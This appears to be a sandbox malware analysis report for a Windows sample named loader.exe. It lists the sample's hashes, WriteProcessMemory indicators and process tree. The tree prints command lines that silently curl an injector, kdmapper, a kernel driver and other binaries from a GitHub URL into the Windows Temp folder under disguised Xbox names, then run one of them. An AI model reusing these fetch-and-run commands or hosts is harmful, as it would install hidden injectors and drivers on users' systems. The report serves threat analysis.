443237c4078d7e4a8368598690e05f1bbcbae5835f15f774fea4ca2e88977a11

Analysis

max time kernel
16s
max time network
18s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
25/07/2024, 11:45 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

135KB
MD5

b90fcc74427e5a7ab6bd79837a20b95a
SHA1

3ba81921b30ea89d85ecd65144bdc62c32cb5a6f
SHA256

443237c4078d7e4a8368598690e05f1bbcbae5835f15f774fea4ca2e88977a11
SHA512

a71c3a123e5ed725314c79c9006729c41dc7cfb4bfd3a7217af5d9f5bd1c555a8ae05d00cb6755e4700d43c048eb854ec0427036dbfbe2a5c985a0a5d440cae9
SSDEEP

3072:gbTb/M7ChLBU3YQCCYCcR6ynAh0ukENe5Nu4bKFvYyO98xJTA:GPtNQCsc1nAh0ukENe64u5I983TA

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 4768	3912	loader.exe	73
PID 3912 wrote to memory of 4768	3912	loader.exe	73
PID 3912 wrote to memory of 1872	3912	loader.exe	74
PID 3912 wrote to memory of 1872	3912	loader.exe	74
PID 3912 wrote to memory of 352	3912	loader.exe	75
PID 3912 wrote to memory of 352	3912	loader.exe	75
PID 3912 wrote to memory of 4232	3912	loader.exe	76
PID 3912 wrote to memory of 4232	3912	loader.exe	76
PID 3912 wrote to memory of 4748	3912	loader.exe	77
PID 3912 wrote to memory of 4748	3912	loader.exe	77
PID 3912 wrote to memory of 5116	3912	loader.exe	78
PID 3912 wrote to memory of 5116	3912	loader.exe	78
PID 3912 wrote to memory of 5084	3912	loader.exe	79
PID 3912 wrote to memory of 5084	3912	loader.exe	79
PID 3912 wrote to memory of 4688	3912	loader.exe	80
PID 3912 wrote to memory of 4688	3912	loader.exe	80
PID 3912 wrote to memory of 4192	3912	loader.exe	81
PID 3912 wrote to memory of 4192	3912	loader.exe	81

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\XboxGameSetup.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1
  2⤵
  PID:4768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\XboxGameSetup.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injector.exe --silent > nul 2>&1
  2⤵
  PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\XboxGamePass.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1
  2⤵
  PID:352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\XboxGamePassSetup.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper.exe --silent > nul 2>&1
  2⤵
  PID:4232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\XboxUpdateChecker.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/KernelInjector.exe --silent > nul 2>&1
  2⤵
  PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Temp\XboxUpdateChecker.exe
  2⤵
  PID:4192

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.